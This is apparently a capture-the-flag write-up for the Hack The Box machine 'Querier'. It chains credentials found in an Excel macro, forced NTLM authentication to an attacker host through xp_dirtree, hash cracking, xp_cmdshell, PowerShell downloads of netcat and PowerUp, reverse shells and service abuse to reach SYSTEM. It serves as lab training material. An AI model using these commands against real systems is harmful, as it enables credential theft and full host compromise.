Hack The Box - Querier

9 minute read

QuerierImage


Summary


Querier is true to its name, requiring exploitation of common SQL vulnerabilities whilst combining elements of combing through macros, insecure SMB shares, hash capturing and cracking, and service exploitation. All in all it is a great box for those wishing to move up from some of the easier machines, but aren’t yet ready to face the burden of more challenging machines.

Gaining Access

  • Find open SMB share
  • Download excel spreadsheet macro file
  • Find credentials in macro
  • Logon to the SQL database and browse
  • Extended procedure to steal hash of user
  • Crack the hash, login and enable shell

Elevating Privileges

  • Upload netcat binary
  • Upload and execute powerup script
  • Locate vulnerable service and gpassword
  • Abuse vulnerable service, or login as Admin

Write-up


Enumeration

First step is to enumerate open ports.

[email protected]:~/Desktop/machines/Querier# nmap -sC -sV -oA nmap10.10.10.125 10.10.10.125 
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server  14.00.1000.00
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2019-04-26T11:59:34
|_Not valid after:  2049-04-26T11:59:34
|_ssl-date: 2019-04-26T12:00:17+00:00; +2s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1s, deviation: 0s, median: 1s
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 
|_    TCP port: 1433
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2019-04-26 21:30:20
|_  start_date: N/A

Find open SMB share

Given ports 135, 139, and 445 were open we can check for any open shares, in this case we find a “Reports” share we can connect to.

[email protected]:~/Desktop/machines/Querier# smbclient -L //10.10.10.125
[email protected]:~/Desktop/machines/Querier# smbclient \\\\10.10.10.125\\Reports

Download Excel Spreadsheet Macro file

Currency Volume Report.xlsm

The only file on the share is a macro enabled spreadsheet, and it seems interesting, so we can download and open it as an archive to get some more information.

smb: \> get "Currency Volume Report.xlsm"

Within the /xl/ directory we find a vbaProject.bin file indicating an embedded macro which we can extract.

Embedded macro file

Find Credentials in Macro

After extracting the macro, one of the ways we can filter noise from the macro is to run the tool strings over it.

[email protected]:~/Desktop/machines/Querier# strings vbaProject.bin
macro to pull data for client volume reports
n.Conn]
Open 
rver=<
SELECT * FROM volume;
word>
 MsgBox "connection successful"
Set rs = conn.Execute("SELECT * @@version;")
Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6
 further testing required

Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6

At this point we have a connection string to the SQL database which includes the database name, user ID and password. Excellent. A more efficient way of extracting the macro, is to use olevba from oletools.

[email protected]:~/Desktop/machines/Querier# olevba Currency\ Volume\ Report.xlsm 
olevba 0.53.1 - http://decalage.info/python/oletools
Flags        Filename                                                         
-----------  -----------------------------------------------------------------
OpX:M-S-H--- Currency Volume Report.xlsm
===============================================================================
FILE: Currency Volume Report.xlsm
Type: OpenXML
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls 
in file: xl/vbaProject.bin - OLE stream: u'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 

' macro to pull data for client volume reports
'
' further testing required

Private Sub Connect()

Dim conn As ADODB.Connection
Dim rs As ADODB.Recordset

Set conn = New ADODB.Connection
conn.ConnectionString = "Driver={SQL Server};Server=QUERIER;Trusted_Connection=no;Database=volume;Uid=reporting;Pwd=PcwTWTHRwryjc$c6"
conn.ConnectionTimeout = 10
conn.Open

If conn.State = adStateOpen Then

  ' MsgBox "connection successful"
 
  'Set rs = conn.Execute("SELECT * @@version;")
  Set rs = conn.Execute("SELECT * FROM volume;")
  Sheets(1).Range("A1").CopyFromRecordset rs
  rs.Close

End If

End Sub
-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls 
in file: xl/vbaProject.bin - OLE stream: u'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 
(empty macro)
+------------+-------------+-----------------------------------------+
| Type       | Keyword     | Description                             |
+------------+-------------+-----------------------------------------+
| Suspicious | Open        | May open a file                         |
| Suspicious | Hex Strings | Hex-encoded strings were detected, may  |
|            |             | be used to obfuscate strings (option    |
|            |             | --decode to see all)                    |
+------------+-------------+-----------------------------------------+

Logon to the SQL database and browse

Using a toolkit known as Impacket which is created by the people at SecureAuthCorp, we are able to logon to the SQL database using the credentials we just obtained. This is done with their mssqlclient python script.

python mssqlclient.py -windows-auth -db volume reporting@10.10.10.125
PcwTWTHRwryjc$c6

From here we can find out what databases exist using an SQL query.

SQL> SELECT name FROM master.dbo.sysdatabases
    name                                                                                                                               
--------------------------------------------------------------------------------------------------------------------------------   
    master                                                                                                                             
    tempdb                                                                                                                             
    model                                                                                                                              
    msdb                                                                                                                               
    volume     

We can also enumerate an unusual hostname with an SQL query, although this doesn’t assist us in getting a shell.

SQL> SELECT HOST_NAME()                                                                                                                         
  --------------------------------------------------------------------------------------------------------------------------------   
    gnehofXY   

Extended procedure to steal hash of user

Following an excellent cheat sheet, we’re able to formulate an extended procedure which allows us to capture the NTLMv2 hash for the Service Account which is running the Microsoft SQL service.

Pentest monkey MSSQL injection cheat sheet

To check whether we can successfully get a connection back, we can run netcat and listen on port 445.

From Host:

[email protected]:~/Desktop/machines/Querier/nmap# nc -nlvp 445
listening on [any] 445 ...
connect to [10.10.12.137] from (UNKNOWN) [10.10.10.125] 49720
E?SMBrS?????"NT LM 0.12SMB 2.002SMB 2.???

From Querier:

SQL> ;declare @q varchar(200);set @q='\\10.10.12.137\fake'+(SELECT SUBSTRING(@@version,1,9)); exec master.dbo.xp_dirtree @q;

Excellent, so from this we know a connection can be made back to our machine. Utilising responder by Laurent Gaffie, we can capture this authentication attempt including the NTLMv2 hash by pretending to be a valid SMB server.

From Host:

[email protected]:~/Desktop/machines/Querier/# responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 2.3.3.9

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CRTL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Fingerprint hosts          [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.12.137]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Listening for events...

From Querier:

SQL> ;declare @q varchar(200);set @q='\\10.10.12.137\fake'+(SELECT SUBSTRING(@@version,1,9)); exec master.dbo.xp_dirtree @q;

Captured NTLMv2 Hash

Crack the hash, login and enable shell

At this point we can use a dedicated cracking machine (in my case a Windows Gaming OS) with hashcat to crack the hashes we’ve just obtained. I placed this in a file called SQL.hash and went at it with the well known rockyou.txt file.

    hashcat64.exe -m 5600 hashes/SQL.hash rockyou.txt
    MSSQL-SVC::QUERIER:bee511ed62c67a37:64494202c2ee247e399e5a1b05589f48:0101000000000000c0653150de09d201ee0eb82b887cacbd000000000200080053004d004200330001001e00570049004e002d00500052004800340039003200520051004100460056000400140053004d00420033002e006c006f00630061006c0003003400570049004e002d00500052004800340039003200520051004100460056002e0053004d00420033002e006c006f00630061006c000500140053004d00420033002e006c006f00630061006c0007000800c0653150de09d20106000400020000000800300030000000000000000000000000300000ea5d7b144fa620bd2506354c599e6a53c06dfba79e19e648685404eb7b386ee90a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310032002e00310033003700000000000000000000000000:corporate568

If you’ve already got these hashes cracked in your potfile you can use the –show parameter to display them.

hashcat64.exe -m 5600 --show hashes/SQL.hash

And with that we now have a password for use.

corporate568

Once again we can use the Impacket toolkit to authenticate as this new user.

[email protected]:~/Desktop/machines/Querier/#python mssqlclient.py -windows-auth -db volume [email protected]0.10.10.125
corporate568

And then after enabling the xp_cmdshell extended function we have code execution and can locate the user.txt file

SQL> enable_xp_cmdshell
SQL> xp_cmdshell dir ..\..\Users\mssql-svc\Desktop

Gaining Access

At this point we can read the user.txt file and execute commands on the machine.

SQL> xp_cmdshell type ..\..\Users\mssql-svc\Desktop\user.txt

User.txt: c37b4…b3c16


Upload netcat binary

This machine has powershell, and as such we can abuse this to upload files to the machine. This is done by making the machine download files from us. To give us more functionality and prevent the need of the xp_cmdshell command, we can upload the Windows netcat binary to the machine in a writeable directory. After moving a copy to our working directory, we host a HTTP Server on port 8080.

From Host:

root@mintsec:~/Desktop/machines/Querier/ python -m SimpleHTTPServer 8080

And now we can now have Querier download our binary, at which point we can spin up a listener that we can then connect to.

From Querier:

SQL> xp_cmdshell powershell -command "(New-Object System.Net.WebClient).DownloadFile(\"http://10.10.12.137:8080/nc.exe\",\"C:\Users\Public\shell.exe\")"
SQL> xp_cmdshell ..\..\Users\Public\shell.exe -nlvp 9999 -e cmd.exe

From Host:

[email protected]:~/Desktop/machines/Querier/ nc 10.10.10.125 9999

From this shell we can run Powershell and check our mapped drives to see if there’s anything of interest. In this case it seems relatively standard,

powershell
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

Upload and execute powerup script

A common windows privilege escalation enumeration script is known as Powerup and is part of the powersploit framework. We can upload or invoke this in memory to find any common privesc areas.

Once again using Powershell we can host and upload this file.

powershell -command "(New-Object System.Net.WebClient).DownloadFile(\"http://10.10.12.137:8080/powerup.ps1\",\"C:\Users\Public\mintyprivesc.ps1\")"

Locate vulnerable service and gpassword

By importing this module and running Invoke-AllChecks we can find at least 2 ways of escalating our privileges.

PS C:\Users\Public> Import-Module ./mintyprivesc.ps1
PS C:\Users\Public> Invoke-AllChecks | Out-File -Encoding ASCII checks.txt
PS C:\Users\Public> type checks.txt   

[*] Running Invoke-AllChecks
    [*] Checking if user is in a local group with administrative privileges...
    [*] Checking for unquoted service paths...
    [*] Checking service executable and argument permissions...
    [*] Checking service permissions...

    ServiceName   : UsoSvc
    Path          : C:\Windows\system32\svchost.exe -k netsvcs -p
    StartName     : LocalSystem
    AbuseFunction : Invoke-ServiceAbuse -Name 'UsoSvc'
    CanRestart    : True

    [*] Checking %PATH% for potentially hijackable DLL locations...

    ModifiablePath    : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
    IdentityReference : QUERIER\mssql-svc
    Permissions       : {WriteOwner, Delete, WriteAttributes, Synchronize...}
    %PATH%            : C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps
    AbuseFunction     : Write-HijackDll -DllPath 'C:\Users\mssql-svc\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'

    [*] Checking for AlwaysInstallElevated registry key...
    [*] Checking for Autologon credentials in registry...
    [*] Checking for modifidable registry autoruns and configs...
    [*] Checking for modifiable schtask files/configs...
    [*] Checking for unattended install files...

    UnattendPath : C:\Windows\Panther\Unattend.xml

    [*] Checking for encrypted web.config strings...
    [*] Checking for encrypted application pool and virtual directory passwords...
    [*] Checking for plaintext passwords in McAfee SiteList.xml files....
    [*] Checking for cached Group Policy Preferences .xml files....

    Changed   : {2019-01-28 23:12:48}
    UserNames : {Administrator}
    NewName   : [BLANK]
    Passwords : {MyUnclesAreMarioAndLuigi!!1!}
    File      : C:\ProgramData\Microsoft\Group 
                Policy\History\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\Groups\Groups.xml

These two areas of interest are shown below:


  • ServiceName : UsoSvc
  • Path : C:\Windows\system32\svchost.exe -k netsvcs -p
  • StartName : LocalSystem
  • AbuseFunction : Invoke-ServiceAbuse -Name ‘UsoSvc’

  • UserNames : {Administrator}
  • Passwords : {MyUnclesAreMarioAndLuigi!!1!}

Abuse vulnerable service, or login as Admin

The first area of interest is a vulnerable service which we can take advantage of using Invoke-ServiceAbuse as part of the Powerup script. First we setup a listener to receive the connection, in this case we’ve chosen port 443 as it’s usually not blocked by any firewall:

From Host:

[email protected]:~/Desktop/machines/Querier# nc -nlvp 443
listening on [any] 443 ...

Then we invoke service abuse on Querier:

 PS C:\Users\Public> Invoke-ServiceAbuse -Name UsoSvc -Command "..\..\Users\Public\shell.exe 10.10.12.137 443 -e cmd.exe"

And finally we get a root shell.

[email protected]:~/Desktop/machines/Querier# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.12.137] from (UNKNOWN) [10.10.10.125] 49726
Microsoft Windows [Version 10.0.17763.292]
(c) 2018 Microsoft Corporation. All rights reserved.

The other way is to simply login using the credentials Powerup has decrypted from the Group Policy Preferences file. This can be done using psexec.py once again which is included as part of the Impacket toolkit.

[email protected]:~/Desktop/machines/Querier# psexec.py 'QUERIER/Administrator':'MyUnclesAreMarioAndLuigi!!1!'@10.10.10.125

From here we have total control over the machine

Elevating Privileges

C:\Windows\system32>cd ../../Users/Administrator/Desktop
C:\Users\Administrator\Desktop>type root.txt

root.txt: b19c3…c3592


Final Notes

At the time of writing other HTB members had rated the machine elements as shown below. Feel free to reach out and provide any feedback or let me know if this helped.

Heatmap